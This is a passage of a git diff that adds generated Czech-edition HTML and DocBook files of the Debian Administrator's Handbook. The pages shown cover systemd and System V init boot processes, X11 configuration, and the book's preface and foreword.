+                class="computeroutput">● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: active (running) since Tue 2015-03-31 17:31:09 CEST; 2s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+ Main PID: 1222 (sshd)
+   CGroup: /system.slice/ssh.service
+           └─1222 /usr/sbin/sshd -D
+# </code></pre><div
+              class="para">
+				After checking the status of the service (failed), we went on to check the logs; they indicate an error in the configuration file. After editing the configuration file and fixing the error, we restart the service, then verify that it is indeed running.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Other types of unit files</strong></p></div></div></div><div
+                class="para">
+				We have only described the most basic of systemd's capabilities in this section. It offers many other interesting features; we will only list a few here:
+			</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+						socket activation: a “socket” unit file can be used to describe a network or Unix socket managed by systemd; this means that the socket will be created by systemd, and the actual service may be started on demand when an actual connection attempt comes. This roughly replicates the feature set of <code
+                        class="command">inetd</code>. See <span
+                        class="citerefentry"><span
+                          class="refentrytitle">systemd.socket</span>(5)</span>.
+					</div></li><li
+                    class="listitem"><div
+                      class="para">
+						timers: a “timer” unit file describes events that occur with a fixed frequency or on specific times; when a service is linked to such a timer, the corresponding task will be executed whenever the timer fires. This allows replicating part of the <code
+                        class="command">cron</code> features. See <span
+                        class="citerefentry"><span
+                          class="refentrytitle">systemd.timer</span>(5)</span>.
+					</div></li><li
+                    class="listitem"><div
+                      class="para">
+						network: a “network“ unit file describes a network interface, which allows configuring such interfaces as well as expressing that a service depends on one particular interface being up.
+					</div></li></ul></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sysvinit"></a>9.1.2. The System V init system</h3></div></div></div><div
+              class="para">
+				The System V init system (which we'll call init for brevity) executes several processes, following instructions from the <code
+                class="filename">/etc/inittab</code> file. The first program that is executed (which corresponds to the <span
+                class="emphasis"><em>sysinit</em></span> step) is <code
+                class="command">/etc/init.d/rcS</code>, a script that executes all of the programs in the <code
+                class="filename">/etc/rcS.d/</code> directory. <a
+                id="id-1.12.4.7.2.5"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.6"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.7"
+                class="indexterm"></a> <a
+                id="id-1.12.4.7.2.8"
+                class="indexterm"></a>
+			</div><div
+              class="para">
+				Among these, you will find successively programs in charge of:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						configuring the console's keyboard;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						loading drivers: most of the kernel modules are loaded by the kernel itself as the hardware is detected; extra drivers are then loaded automatically when the corresponding modules are listed in <code
+                      class="filename">/etc/modules</code>;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						checking the integrity of filesystems;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						mounting local partitions;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						configuring the network;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						mounting network filesystems (NFS).
+					</div></li></ul></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Kernel modules and options</strong></p></div></div></div><a
+                id="id-1.12.4.7.5.2"
+                class="indexterm"></a><div
+                class="para">
+				Kernel modules also have options that can be configured by putting some files in <code
+                  class="filename">/etc/modprobe.d/</code>. These options are defined with directives like this: <code
+                  class="literal">options <em
+                    class="replaceable">module-name</em> <em
+                    class="replaceable">option-name</em>=<em
+                    class="replaceable">option-value</em></code>. Several options can be specified with a single directive if necessary.
+			</div><div
+                class="para">
+				These configuration files are intended for <code
+                  class="command">modprobe</code> — the program that loads a kernel module with its dependencies (modules can indeed call other modules). This program is provided by the <span
+                  class="pkg pkg">kmod</span> package.
+			</div><a
+                id="id-1.12.4.7.5.5"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.5.6"
+                class="indexterm"></a></div><div
+              class="para">
+				After this stage, <code
+                class="command">init</code> takes over and starts the programs enabled in the default runlevel (which is usually runlevel 2). It executes <code
+                class="command">/etc/init.d/rc 2</code>, a script that starts all services which are listed in <code
+                class="filename">/etc/rc2.d/</code> and whose names start with the “S” letter. The two-figures number that follows had historically been used to define the order in which services had to be started, but nowadays the default boot system uses <code
+                class="command">insserv</code>, which schedules everything automatically based on the scripts' dependencies. Each boot script thus declares the conditions that must be met to start or stop the service (for example, if it must start before or after another service); <code
+                class="command">init</code> then launches them in the order that meets these conditions. The static numbering of scripts is therefore no longer taken into consideration (but they must always have a name beginning with “S” followed by two digits and the actual name of the script used for the dependencies). Generally, base services (such as logging with <code
+                class="command">rsyslog</code>, or port assignment with <code
+                class="command">portmap</code>) are started first, followed by standard services and the graphical interface (<code
+                class="command">gdm3</code>).
+			</div><div
+              class="para">
+				This dependency-based boot system makes it possible to automate re-numbering, which could be rather tedious if it had to be done manually, and it limits the risks of human error, since scheduling is conducted according to the parameters that are indicated. Another benefit is that services can be started in parallel when they are independent from one another, which can accelerate the boot process.
+			</div><a
+              id="id-1.12.4.7.8"
+              class="indexterm"></a><a
+              id="id-1.12.4.7.9"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">init</code> distinguishes several runlevels, so it can switch from one to another with the <code
+                class="command">telinit <em
+                  class="replaceable">new-level</em></code> command. Immediately, <code
+                class="command">init</code> executes <code
+                class="command">/etc/init.d/rc</code> again with the new runlevel. This script will then start the missing services and stop those that are no longer desired. To do this, it refers to the content of the <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> (where <em
+                class="replaceable">X</em> represents the new runlevel). Scripts starting with “S” (as in “Start”) are services to be started; those starting with “K” (as in “Kill”) are the services to be stopped. The script does not start any service that was already active in the previous runlevel.
+			</div><div
+              class="para">
+				By default, System V init in Debian uses four different runlevels:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						Level 0 is only used temporarily, while the computer is powering down. As such, it only contains many “K” scripts.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 1, also known as single-user mode, corresponds to the system in degraded mode; it includes only basic services, and is intended for maintenance operations where interactions with ordinary users are not desired.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 2 is the level for normal operation, which includes networking services, a graphical interface, user logins, etc.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						Level 6 is similar to level 0, except that it is used during the shutdown phase that precedes a reboot.
+					</div></li></ul></div><div
+              class="para">
+				Other levels exist, especially 3 to 5. By default they are configured to operate the same way as level 2, but the administrator can modify them (by adding or deleting scripts in the corresponding <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> directories) to adapt them to particular needs.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.boot-process-sysvinit"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/startup-sysvinit.png"
+                    alt="Boot sequence of a computer running Linux with System V init" /></div></div><p
+                class="title"><strong>Obrázek 9.2. Boot sequence of a computer running Linux with System V init</strong></p></div><a
+              id="id-1.12.4.7.15"
+              class="indexterm"></a><div
+              class="para">
+				All the scripts contained in the various <code
+                class="filename">/etc/rc<em
+                  class="replaceable">X</em>.d</code> directories are really only symbolic links — created upon package installation by the <code
+                class="command">update-rc.d</code> program — pointing to the actual scripts which are stored in <code
+                class="filename">/etc/init.d/</code>. The administrator can fine tune the services available in each runlevel by re-running <code
+                class="command">update-rc.d</code> with adjusted parameters. The <span
+                class="citerefentry"><span
+                  class="refentrytitle">update-rc.d</span>(1)</span> manual page describes the syntax in detail. Please note that removing all symbolic links (with the <code
+                class="literal">remove</code> parameter) is not a good method to disable a service. Instead you should simply configure it to not start in the desired runlevel (while preserving the corresponding calls to stop it in the event that the service runs in the previous runlevel). Since <code
+                class="command">update-rc.d</code> has a somewhat convoluted interface, you may prefer using <code
+                class="command">rcconf</code> (from the <span
+                class="pkg pkg">rcconf</span> package) which provides a more user-friendly interface.
+			</div><a
+              id="id-1.12.4.7.17"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> Restarting services</strong></p></div></div></div><a
+                id="id-1.12.4.7.18.2"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.18.3"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.18.4"
+                class="indexterm"></a><div
+                class="para">
+				The maintainer scripts for Debian packages will sometimes restart certain services to ensure their availability or get them to take certain options into account. The command that controls a service — <code
+                  class="command">service <em
+                    class="replaceable">service</em> <em
+                    class="replaceable">operation</em></code> — doesn't take runlevel into consideration, assumes (wrongly) that the service is currently being used, and may thus initiate incorrect operations (starting a service that was deliberately stopped, or stopping a service that is already stopped, etc.). Debian therefore introduced the <code
+                  class="command">invoke-rc.d</code> program: this program must be used by maintainer scripts to run services initialization scripts and it will only execute the necessary commands. Note that, contrary to common usage, the <code
+                  class="filename">.d</code> suffix is used here in a program name, and not in a directory.
+			</div></div><div
+              class="para">
+				Finally, <code
+                class="command">init</code> starts control programs for various virtual consoles (<code
+                class="command">getty</code>). It displays a prompt, waiting for a username, then executes <code
+                class="command">login <em
+                  class="replaceable">user</em></code> to initiate a session.
+			</div><a
+              id="id-1.12.4.7.20"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Console and terminal</strong></p></div></div></div><div
+                class="para">
+				The first computers were usually separated into several, very large parts: the storage enclosure and the central processing unit were separate from the peripheral devices used by the operators to control them. These were part of a separate furniture, the “console”. This term was retained, but its meaning has changed. It has become more or less synonymous with “terminal”, being a keyboard and a screen.
+			</div><div
+                class="para">
+				With the development of computers, operating systems have offered several virtual consoles to allow for several independent sessions at the same time, even if there is only one keyboard and screen. Most GNU/Linux systems offer six virtual consoles (in text mode), accessible by typing the key combinations <span
+                  class="keycap"><strong>Control</strong></span>+<span
+                  class="keycap"><strong>Alt</strong></span>+<span
+                  class="keycap"><strong>F1</strong></span> through <span
+                  class="keycap"><strong>Control</strong></span>+<span
+                  class="keycap"><strong>Alt</strong></span>+<span
+                  class="keycap"><strong>F6</strong></span>.
+			</div><div
+                class="para">
+				By extension, the terms “console” and “terminal” can also refer to a terminal emulator in a graphical X11 session (such as <code
+                  class="command">xterm</code>, <code
+                  class="command">gnome-terminal</code> or <code
+                  class="command">konsole</code>).
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-installation.html"><strong>Předcházející</strong>8.11. Installing a Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.remote-login.html"><strong>Další</strong>9.2. Remote Login</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/website.html b/tmp/cs-CZ/html/website.html
new file mode 100644
index 000000000..d5be34c6e
--- /dev/null
+++ b/tmp/cs-CZ/html/website.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha D. Get the book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="backcover.html"
+        title="Příloha C. The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="sect.download-the-electronic-version.html"
+        title="D.2. Download the electronic version" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/website.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="backcover.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-electronic-version.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="website"></a>Příloha D. Get the book</h1></div></div></div><div
+          class="para">
+		Before going further, if you want to make up your mind about the book, you're invited to <a
+            href="https://debian-handbook.info/browse/en-US/stable/">browse the online version</a>.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.buy-the-paperback"></a>D.1. Buy the English Paperback</h2></div></div></div><div
+            class="para">
+			The paperback is available through Lulu's print-on-demand service at a price of €44.90 (without VAT and shipping). <a
+              href="">Click here to view the book details on Lulu.com</a>. Click on the button below to buy it directly.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="backcover.html"><strong>Předcházející</strong>Příloha C. The Debian Administrator's Handbook</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-electronic-version.html"><strong>Další</strong>D.2. Download the electronic version</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/workstation.html b/tmp/cs-CZ/html/workstation.html
new file mode 100644
index 000000000..208138fa4
--- /dev/null
+++ b/tmp/cs-CZ/html/workstation.html
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 13. Workstation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.monitoring.html"
+        title="12.4. Monitoring" /><link
+        rel="next"
+        href="sect.customizing-graphical-interface.html"
+        title="13.2. Customizing the Graphical Interface" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/workstation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.monitoring.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.customizing-graphical-interface.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="workstation"></a>Kapitola 13. Workstation</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="workstation.html#sect.x11-server-configuration">13.1. Configuring the X11 Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.customizing-graphical-interface.html">13.2. Customizing the Graphical Interface</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.2">13.2.1. Choosing a Display Manager</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.3">13.2.2. Choosing a Window Manager</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.4">13.2.3. Menu Management</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.graphical-desktops.html">13.3. Graphical Desktops</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1. GNOME</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#id-1.16.6.13">13.3.2. KDE and Plasma</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#id-1.16.6.14">13.3.3. Xfce and Others</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.main-desktop-tools.html">13.4. Email</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.3">13.4.1. Evolution</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.4">13.4.2. KMail</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.5">13.4.3. Thunderbird and Icedove</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.web-browsers.html">13.5. Web Browsers</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.development.html">13.6. Development</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.development.html#id-1.16.9.2">13.6.1. Tools for GTK+ on GNOME</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.development.html#id-1.16.9.3">13.6.2. Tools for Qt</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.collaborative-work.html">13.7. Collaborative Work</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html#id-1.16.10.3">13.7.1. Working in Groups: <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">groupware</em></span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html#id-1.16.10.4">13.7.2. Collaborative Work With FusionForge</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.office-suites.html">13.8. Office Suites</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.windows-emulation.html">13.9. Emulating Windows: Wine</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.rtc-clients.html">13.10. Real-Time Communications software</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		Now that server deployments are done, the administrators can focus on installing the individual workstations and creating a typical configuration.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.x11-server-configuration"></a>13.1. Configuring the X11 Server</h2></div></div></div><a
+            id="id-1.16.4.2"
+            class="indexterm"></a><a
+            id="id-1.16.4.3"
+            class="indexterm"></a><a
+            id="id-1.16.4.4"
+            class="indexterm"></a><a
+            id="id-1.16.4.5"
+            class="indexterm"></a><div
+            class="para">
+			The initial configuration for the graphical interface can be awkward at times; very recent video cards often don't work perfectly with the X.org version shipped in the Debian stable version.
+		</div><div
+            class="para">
+			A brief reminder: X.org is the software component that allows graphical applications to display windows on screen. It includes a driver that makes efficient use of the video card. The features offered to the graphical applications are exported through a standard interface, <span
+              class="emphasis"><em>X11</em></span> (<span
+              class="distribution distribution">Stretch</span> contains version <span
+              class="emphasis"><em>X11R7.7</em></span>).
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> X11, XFree86 and X.org</strong></p></div></div></div><div
+              class="para">
+			X11 is the graphical system most widely used on Unix-like systems (also available for Windows and Mac OS). Strictly speaking, the term “X11” only refers to a protocol specification, but it is also used to refer to the implementation in practice.
+		</div><div
+              class="para">
+			X11 had a rough start, but the 1990s saw XFree86 emerge as the reference implementation because it was free software, portable, and maintained by a collaborative community. However, the rate of evolution slowed down near the end when the software only gained new drivers. That situation, along with a very controversial license change, led to the X.org fork in 2004. This is now the reference implementation, and Debian <span
+                class="distribution distribution">Stretch</span> uses X.org version 7.7.
+		</div></div><div
+            class="para">
+			Current versions of X.org are able to autodetect the available hardware: this applies to the video card and the monitor, as well as keyboards and mice; in fact, it is so convenient that the package no longer even creates a <code
+              class="filename">/etc/X11/xorg.conf</code> configuration file.
+		</div><a
+            id="id-1.16.4.10"
+            class="indexterm"></a><div
+            class="para">
+			The keyboard configuration is currently set up in <code
+              class="filename">/etc/default/keyboard</code>. This file is used both to configure the text console and the graphical interface, and it is handled by the <span
+              class="pkg pkg">keyboard-configuration</span> package. Details on configuring the keyboard layout are available in <a
+              class="xref"
+              href="basic-configuration.html#sect.keyboard-config">8.1.2 – „Configuring the Keyboard“</a>.
+		</div><div
+            class="para">
+			The <span
+              class="pkg pkg">xserver-xorg-core</span> package provides a generic X server, as used by the 7.x versions of X.org. This server is modular and uses a set of independent drivers to handle the many different kinds of video cards. Installing <span
+              class="pkg pkg">xserver-xorg</span> ensures that both the server and at least one video driver are installed.
+		</div><a
+            id="id-1.16.4.13"
+            class="indexterm"></a><a
+            id="id-1.16.4.14"
+            class="indexterm"></a><div
+            class="para">
+			Note that if the detected video card is not handled by any of the available drivers, X.org tries using the VESA and fbdev drivers. VESA is a generic driver that should work everywhere, but with limited capabilities (fewer available resolutions, no hardware acceleration for games and visual effects for the desktop, and so on) while fbdev works on top of the kernel's framebuffer device. Nowadays the X server runs without any administrative privileges (this used to be required to be able to configure the screen) and thus its log file is now stored in the user's home directory in <code
+              class="filename">~/.local/share/xorg/Xorg.0.log</code> (whereas it used to be in <code
+              class="filename">/var/log/Xorg.0.log</code> for versions older than <span
+              class="distribution distribution">Stretch</span>). That log file is where one would look to know what driver is currently in use. For example, the following snippet matches what the <code
+              class="literal">intel</code> driver outputs when it is loaded:
+		</div><pre
+            class="programlisting">
+(==) Matched intel as autoconfigured driver 0
+(==) Matched modesetting as autoconfigured driver 1
+(==) Matched vesa as autoconfigured driver 2
+(==) Matched fbdev as autoconfigured driver 3
+(==) Assigned the driver to the xf86ConfigLayout
+(II) LoadModule: "intel"
+(II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
+</pre><a
+            id="id-1.16.4.17"
+            class="indexterm"></a><a
+            id="id-1.16.4.18"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Proprietary drivers</strong></p></div></div></div><div
+              class="para">
+			Some video card makers (most notably nVidia) refuse to publish the hardware specifications that would be required to implement good free drivers. They do, however, provide proprietary drivers that allow using their hardware. This policy is nefarious, because even when the provided driver exists, it is usually not as polished as it should be; more importantly, it does not necessarily follow the X.org updates, which may prevent the latest available driver from loading correctly (or at all). We cannot condone this behavior, and we recommend you avoid these makers and favor more cooperative manufacturers.
+		</div><div
+              class="para">
+			If you still end up with such a card, you will find the required packages in the <span
+                class="emphasis"><em>non-free</em></span> section: <span
+                class="pkg pkg">nvidia-driver</span> for nVidia cards. It requires a matching kernel module. Building the module can be automated by installing the package <span
+                class="pkg pkg">nvidia-kernel-dkms</span> (for nVidia).
+		</div><div
+              class="para">
+			The “nouveau” project aims to develop a free software driver for nVidia cards and is the default driver that you get for nVidia cards in Debian. As of <span
+                class="distribution distribution">Stretch</span>, its feature set and performance do not match the proprietary driver. In the developers' defense, we should mention that the required information can only be gathered by reverse engineering, which makes things difficult. The free driver for ATI video cards, called “radeon”, is much better in that regard although it often requires non-free firmware.
+		</div><a
+              id="id-1.16.4.19.5"
+              class="indexterm"></a><a
+              id="id-1.16.4.19.6"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.monitoring.html"><strong>Předcházející</strong>12.4. Monitoring</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.customizing-graphical-interface.html"><strong>Další</strong>13.2. Customizing the Graphical Interface</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/xml/00a_preface.xml b/tmp/cs-CZ/xml/00a_preface.xml
new file mode 100644
index 000000000..c71aef75d
--- /dev/null
+++ b/tmp/cs-CZ/xml/00a_preface.xml
@@ -0,0 +1,31 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE preface PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<preface id="preface" lang="cs-CZ">
+	<title>Úvodní slovo</title>
+	 <para>
+		Thank you for your interest in Debian. At the time of writing, more than 10% of the web is powered by Debian. Think about it; how many web sites would you have missed today without Debian?
+	</para>
+	 <para>
+		Debian is the operating system of choice on the International Space Station, and countless universities, companies and public administrations rely on Debian to deliver services to millions of users around the world and beyond. Truly, Debian is a highly successful project and is far more pervasive in our lives than people are aware of.
+	</para>
+	 <para>
+		But Debian is much more than “just” an operating system. First, Debian is a concrete vision of the freedoms that people should enjoy in a world increasingly dependent on computers. It is forged from the crucible of Free Software ideals where people should be in control of their devices and not the other way around. With enough knowledge you should be able to dismantle, modify, reassemble and share the software that matters to you. It doesn't matter if the software is used for frivolous or even life-threatening tasks, you should be in control of it.
+	</para>
+	 <para>
+		Secondly, Debian is a very peculiar social experiment. Entirely volunteer-led, individual contributors take on all the responsibilities needed to keep Debian functioning rather than being delegated or assigned tasks by a company or organization. This means that Debian can be trusted to not be driven by the commercial interests or whims of companies that may not be aligned with the goal of promoting people's freedoms.
+	</para>
+	 <para>
+		And the book you have in your hands is vastly different from other books; it is a <emphasis>free as in freedom</emphasis> book, a book that finally lives up to Debian's standards for every aspect of your digital life. You can <command>apt install</command> this book, you can redistribute it, you can “fork” it, and even submit bug reports and patches so that other readers may benefit from your feedback. The maintainers of this book — who are also its authors — are longstanding members of the Debian Project who truly understand the ethos that permeate every aspect of the project.
+	</para>
+	 <para>
+		By writing and releasing this book, they are doing a truly wonderful service to the Debian community.
+	</para>
+	 <para>
+		May 2017
+	</para>
+	 <para>
+		Chris Lamb (Debian Project Leader)
+	</para>
+</preface>
+
diff --git a/tmp/cs-CZ/xml/00b_foreword.xml b/tmp/cs-CZ/xml/00b_foreword.xml
new file mode 100644
index 000000000..de3eb4a6a
--- /dev/null
+++ b/tmp/cs-CZ/xml/00b_foreword.xml
@@ -0,0 +1,281 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE preface PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<preface id="foreword" lang="cs-CZ">
+	<title>Předmluva</title>
+	 <para>
+		Linux nabíral na síle po řadu let, a jeho rostoucí popularita pobízí více a více uživatelů, aby učinili tento skok. Prvním krokem na této cestě je vybrat distribuci. To je důležité rozhodnutí, protože každá distribuce má své vlastní zvláštnosti, a budoucím nákladům na migraci se lze vyhnout, pokud je učiněna správná volba již od začátku.
+	</para>
+	 <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Linuxová distribuce, linuxové jádro</title>
+	 <indexterm>
+		<primary>Linux</primary>
+		<secondary>jádro</secondary>
+	</indexterm>
+	 <indexterm>
+		<primary>Linux</primary>
+		<secondary>distribuce</secondary>
+	</indexterm>
+	 <indexterm>
+		<primary>distribuce</primary>
+		<secondary>Linuxová distribuce</secondary>
+	</indexterm>
+	 <para>
+		Striktně vzato, Linux je pouze jádro, jádro je kus softwaru, který sídlí mezi hardwarem a aplikací.
+	</para>
+	 <para>
